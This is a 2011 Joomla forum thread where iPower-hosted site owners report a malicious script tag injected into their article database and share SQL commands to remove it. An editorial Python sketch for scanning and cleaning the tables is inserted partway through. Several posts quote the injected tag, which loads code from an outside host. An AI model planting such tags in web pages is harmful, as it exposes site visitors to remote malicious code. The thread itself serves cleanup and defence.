My Site Hacked

Discussion regarding Joomla! security issues.

dhas
Joomla! Apprentice
Posts: 42
Joined: Sat Dec 30, 2006 12:35 am

My Site Hacked

Post by dhas » Tue May 17, 2011 7:58 pm

Joomla 1.0.15 site

A script line of code has been added to every page of our site and I can't figure out how - I would have to guess some type of script was run on the mysql database? - the line added is <script src="http://infoitpoweringgathering.com/ll.p ... "></script>

does anyone know how this could have happened, through database or other means and:

How can I remove it from all pages quickly?

seoirserob
Joomla! Apprentice
Posts: 12
Joined: Wed May 18, 2011 11:16 am
Location: Ireland

Looking for an answer also . . . any ideas?

Post by seoirserob » Wed May 18, 2011 1:47 pm

I've no idea where this came from . . . same script.
Any ideas?
If I delete it manually from each article will it reappear?

acedrummond
Joomla! Apprentice
Posts: 25
Joined: Fri Jul 24, 2009 12:23 pm
Location: Parker CO

Re: My Site Hacked

Post by acedrummond » Wed May 18, 2011 4:26 pm

I have this problem today too!

Can someone tell me where you find this malicious code please! Thanks!

seoirserob
Joomla! Apprentice
Posts: 12
Joined: Wed May 18, 2011 11:16 am
Location: Ireland

Joomla Version

Post by seoirserob » Wed May 18, 2011 5:18 pm

A Google search for the offending script yielded this page; however, I had not noticed that in the original post you say you are using an old release of Joomla! The current version is 1.5.23

Still though, I am using the current release. Yesterday I tried to set up Search Engine Friendly urls, but was having some trouble, in the process I renamed my htaccess.txt file, I think this may have allowed the script in. I have had trouble with a .htaccess file with this host once before, though not with a Joomla! installation.

I have since uploaded the original file from a backup and tried something simple. In phpMyAdmin I exported the database and opened it in a text editor. I then ran a find and replace for the offending code, and removed all instances - the easy way is to hit "replace all" with the "replace with" field blank. I then saved this and imported the updated .msql file into a new database. Problem solved it seems for me, for now.

I am no expert, so I do not know if I have found the root of the problem. If you do attempt any of this, do backups first, so you might retrace your steps should it all go wrong.

acedrummond
Joomla! Apprentice
Posts: 25
Joined: Fri Jul 24, 2009 12:23 pm
Location: Parker CO

Re: My Site Hacked

Post by acedrummond » Wed May 18, 2011 5:24 pm

I've found the line of code added to each page in the jos_content and am removing it manually!

acedrummond
Joomla! Apprentice
Posts: 25
Joined: Fri Jul 24, 2009 12:23 pm
Location: Parker CO

Re: My Site Hacked

Post by acedrummond » Wed May 18, 2011 6:23 pm

I cleaned out the line of code with the problem from jos content/introtext in every page entry; however, I'm now looking for where to make the same change for the home page as it still has two instances of this code!!

Anyone know where I can find this?

acedrummond
Joomla! Apprentice
Posts: 25
Joined: Fri Jul 24, 2009 12:23 pm
Location: Parker CO

Re: My Site Hacked

Post by acedrummond » Wed May 18, 2011 7:06 pm

OK solved it myself! - there were more lines in jos_content I missed the first time. Now it is cleaned out, but why and how are the next questions! How to prevent in future?

NyHick
Joomla! Enthusiast
Posts: 240
Joined: Wed Jan 07, 2009 8:17 pm
Location: New York City

Re: My Site Hacked

Post by NyHick » Thu May 19, 2011 12:22 am

Question: are any of these sites perhaps hosted with IPOWER?
A clever person solves a problem. A wise person avoids it.

adamisaacebert
Joomla! Fledgling
Posts: 1
Joined: Thu May 19, 2011 1:12 am

Re: My Site Hacked

Post by adamisaacebert » Thu May 19, 2011 1:14 am

I just found this on one of my client's sites...and they are hosted by iPower.

joebear21
Joomla! Fledgling
Posts: 2
Joined: Thu May 19, 2011 1:29 am

Re: My Site Hacked

Post by joebear21 » Thu May 19, 2011 1:32 am

Our Joomla site also has this problem and is also hosted by iPower. The site isn't even online at the moment, it is still being designed so I took it offline. I'm going to try removing the script manually and hope for the best. It really hangs the load time which is how I noticed it.

NyHick
Joomla! Enthusiast
Posts: 240
Joined: Wed Jan 07, 2009 8:17 pm
Location: New York City

Re: My Site Hacked

Post by NyHick » Thu May 19, 2011 1:32 am

That is what I figured.
IPOWER servers have been hacked.
The code is being placed into records in the database.
For Wordpress sites read this forum post:
http://wordpress.org/support/topic/i-di ... range-code
For Joomla! sites... well, I am working on coming up with a solution that doesn't involve having to edit every record.
A clever person solves a problem. A wise person avoids it.

acedrummond
Joomla! Apprentice
Posts: 25
Joined: Fri Jul 24, 2009 12:23 pm
Location: Parker CO

Re: My Site Hacked

Post by acedrummond » Thu May 19, 2011 1:47 am

Mine was IPOWER also!

I spoke to them and have an open case that is escalated with them.

The fix is to edit your Joomla database with phpMyAdmin, jos content/introtext field in every page entry, and remove the last line of code that starts with <script> and refers to the problem web site through the </script>, and make sure you get them all and it is fixed!

joebear21
Joomla! Fledgling
Posts: 2
Joined: Thu May 19, 2011 1:29 am

Re: My Site Hacked

Post by joebear21 » Thu May 19, 2011 1:59 am

I removed all the script lines. Anyone have an idea on how we can prevent this from happening again?

NyHick
Joomla! Enthusiast
Posts: 240
Joined: Wed Jan 07, 2009 8:17 pm
Location: New York City

Re: My Site Hacked

Post by NyHick » Thu May 19, 2011 2:20 am

I agree that the fix can be done through phpmyadmin. But here are the issues:
* I have a client site which has over 500 articles.
* Unless IPOWER is able to discover the cause of the breach, fixes (or patches) the issue, and notifies every user on their servers of the breach, and every user fixes their sites, then there is a very real chance that the script may be placed into the site db records again.

I saw this happen with MediaTemple a couple of years ago and it was a big mess. So far IPOWER has not issued anything or even put up a System Notice in their Support Help Center.

I posted a notification in the message board about the issue along with everything I know so far.
http://forum.joomla.org/viewtopic.php?f=428&t=621812
A clever person solves a problem. A wise person avoids it.

acedrummond
Joomla! Apprentice
Posts: 25
Joined: Fri Jul 24, 2009 12:23 pm
Location: Parker CO

Re: My Site Hacked

Post by acedrummond » Thu May 19, 2011 3:47 am

I received a message from IPOWER about 1 hour ago that they 'removed the malicious code...' but no details.
Since I cleaned up myself I don't know what they did or are talking about so I asked them to explain and hopefully will get a reply to explain.
I suspect there was something else planted that did this, but let's pursue IPOWER for answers. I know I certainly will!

seoirserob
Joomla! Apprentice
Posts: 12
Joined: Wed May 18, 2011 11:16 am
Location: Ireland

Re: My Site Hacked

Post by seoirserob » Thu May 19, 2011 7:40 am

My site is also hosted on iPower, this is not the first time I have had a site hacked on their servers, last time it involved the .htaccess as far as I remember, so I presumed this had played a part again. Am I wrong in thinking that this file can alter the content on each page if hacked?

Will also raise it with iPower today.

Slán go fóill.

dhas
Joomla! Apprentice
Posts: 42
Joined: Sat Dec 30, 2006 12:35 am

Re: My Site Hacked

Post by dhas » Thu May 19, 2011 12:08 pm

It appears that the script was only added to the introtext - I ran the following script in phpMyAdmin to remove it from the entire site. Sorry I didn't post the day it happened. My site has very strong passwords since my site was hacked a few years ago and the .htaccess file replaced - so I suspect it is on the iPower side that they gained access.

UPDATE jos_content SET introtext = replace(introtext,'<script src="http://infoitpoweringgathering.com/ll.p ... "></script>','')

This page explains how to replace data in a mysql database - might be good to keep on hand for any future needs: http://www.mydigitallife.info/how-to-fi ... using-sql/

acedrummond
Joomla! Apprentice
Posts: 25
Joined: Fri Jul 24, 2009 12:23 pm
Location: Parker CO

Re: My Site Hacked

Post by acedrummond » Fri May 20, 2011 12:51 am

To put the whipped cream and the cherry on the cake, IPOWER went into my database after I fixed the problem during the day and managed to corrupt my jos_content table.

Repeated support calls got very polite, but ineffective responses.

I finally got someone to tell me where the backup was and was able to extract the content, repair the malicious insert into introtext and reload and my site back up after 24 hours of frustration with total ineptitude of the provider iPOWER - shame on them.

I will leave them unless they explain how the database was harmed by tech support and how this whole episode started in the first place.

I have many other Joomla sites with other providers and this does not happen there!

seoirserob
Joomla! Apprentice
Posts: 12
Joined: Wed May 18, 2011 11:16 am
Location: Ireland

Re: My Site Hacked

Post by seoirserob » Fri May 20, 2011 7:24 am

Not entirely convinced by this host, security or service. When my ticket was submitted they asked for my affected domains (three in total), but also for the admin login details and passwords, which I did not provide, but today received the following reply . . . :

"Thank you for contacting Support.

The issue you have reported is now resolved and the hacked code has been removed from your database. Please insure your Joomla application and all plug ins are up to date and that you are using strong passwords that contain letters, numbers and special characters and are not based on dictionary words for your databases to help your blog be more resistant to these types of issues going forward. Please let us know if you need further assistance."

(Am I to believe they went ahead and gained access wherever they felt like it, without my provision of passwords, to clean a database I had already cleaned? If so is this where the problem arises, can any human on their tech payroll access the database or admin of my site whenever they deem necessary? Or are they taking credit for the clean out I had already done, which does not inspire confidence? Sounds to me like not admitting they haven't a clue . . . )

acedrummond
Joomla! Apprentice
Posts: 25
Joined: Fri Jul 24, 2009 12:23 pm
Location: Parker CO

Re: My Site Hacked

Post by acedrummond » Fri May 20, 2011 2:38 pm

My experience was that they got into my database and managed to corrupt the jos_content table AFTER I had already cleaned out the junk and told them I was already OK.

I suspect that all the MySql databases are managed as one or possibly groups and can be accessed from the top tier without our permission.

They offer no explanation nor information about what they are doing about this.

I'm preparing to leave them because I don't need this, as other providers offer better service and none of these problems.

Every issue I've brought to them has been solved by me because they are unresponsive and unprofessional.

All I can say is they are polite and 'Have a good day!'

3 strikes and they are out!

savvaslim
Joomla! Fledgling
Posts: 3
Joined: Thu Nov 19, 2009 12:11 pm

Re: My Site Hacked

Post by savvaslim » Mon Aug 08, 2011 10:34 am

Hi
I had the same issue and ipower. I used the command
update `jml_content` set `introtext`=TRIM(TRAILING '<script src="http://infoitpoweringgathering. com/ll.php?kk=11"></script>' FROM `introtext`);

to update them all at once and not miss anything.
does anyone think there is another field or table that was affected?
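
Added example, not part of any post in this thread: the exact-string REPLACE and TRIM statements above miss copies of the tag with a different query string, in the middle of a field, or in another column or table, so this sketch scans every text column for a script tag pointing at the host named in the posts and strips it. It uses Python's built-in sqlite3 as a stand-in for the MySQL database; the schema is a simplified assumption, and the rows (including the `kk=12` variant) are constructed.

```python
import re
import sqlite3

# Host comes from the posts above; path and query are matched loosely because
# the thread shows them elided and with a varying parameter.
BAD_HOST = "infoitpoweringgathering.com"
INJECTED = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']?https?://'
                      + re.escape(BAD_HOST) + r'[^>]*>\s*</script>', re.I)

def scan(conn):
    """Return (table, column, rowid, value) for every text cell with the tag."""
    hits = []
    tables = conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table'").fetchall()
    for (table,) in tables:
        for _cid, col, ctype, *_rest in conn.execute(
                f'PRAGMA table_info("{table}")').fetchall():
            if "TEXT" not in ctype.upper():
                continue
            rows = conn.execute(
                f'SELECT rowid, "{col}" FROM "{table}" WHERE "{col}" LIKE ?',
                (f"%{BAD_HOST}%",)).fetchall()
            hits += [(table, col, rid, val) for rid, val in rows
                     if INJECTED.search(val)]
    return hits

def clean(conn):
    """Strip the tag from every cell scan() reports; return cells changed."""
    hits = scan(conn)
    for table, col, rid, val in hits:
        conn.execute(f'UPDATE "{table}" SET "{col}"=? WHERE rowid=?',
                     (INJECTED.sub("", val), rid))
    conn.commit()
    return len(hits)

def demo_db():
    """Constructed rows in a simplified, assumed Joomla-like schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        'CREATE TABLE jos_content (id INTEGER PRIMARY KEY,'
        ' introtext TEXT, "fulltext" TEXT);'
        'CREATE TABLE jos_modules (id INTEGER PRIMARY KEY, content TEXT);')
    tag = f'<script src="http://{BAD_HOST}/ll.php?kk=%d"></script>'
    conn.executemany("INSERT INTO jos_content VALUES (?, ?, ?)", [
        (1, "<p>Intro</p>" + tag % 11, "<p>Body</p>"),
        (2, "<p>Clean</p>", "<p>More</p>" + tag % 12),  # variant parameter
        (3, f"<p>Note about {BAD_HOST}</p>", "")])       # mention, not a tag
    conn.execute("INSERT INTO jos_modules VALUES (1, ?)",
                 ("<div>Menu</div>" + tag % 11 + "<p>Footer</p>",))
    return conn
```

Running `scan()` before `clean()` gives the list of affected cells to record for the incident, and an empty `scan()` afterwards confirms the cleanup; neither addresses how the rows were written in the first place.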

raghavmitra
Joomla! Apprentice
Posts: 7
Joined: Sat Jan 28, 2012 8:55 am

Re: My Site Hacked

Post by raghavmitra » Mon Jan 30, 2012 7:04 am

seoirserob wrote:Not entirely convinced by this host, security or service. When my ticket was submitted they asked for my affected domains (three in total), but also for the admin login details and passwords, which I did not provide, but today received the following reply . . . :

"Thank you for contacting Support.

The issue you have reported is now resolved and the hacked code has been removed from your database. Please insure your Joomla application and all plug ins are up to date and that you are using strong passwords that contain letters, numbers and special characters and are not based on dictionary words for your databases to help your blog be more resistant to these types of issues going forward. Please let us know if you need further assistance."

(Am I to believe they went ahead and gained access wherever they felt like it, without my provision of passwords, to clean a database I had already cleaned? If so is this where the problem arises, can any human on their tech payroll access the database or admin of my site whenever they deem necessary? Or are they taking credit for the clean out I had already done, which does not inspire confidence? Sounds to me like not admitting they haven't a clue . . . )

Support rep asking for login credentials is just a false show to make you believe that even they don't have access to your server, which in fact is just a myth. Even I have a reseller's hosting account and do provide my customers with hosting accounts, and I don't need their login details to access their servers.

So the moral of the story is that besides keeping your scripts updated, it's necessary to choose a reliable host. If you have an important business website always opt for a dedicated hosting server. And last and not the least, avoid buying cheap hosting from forums and other places. My 2 cents.

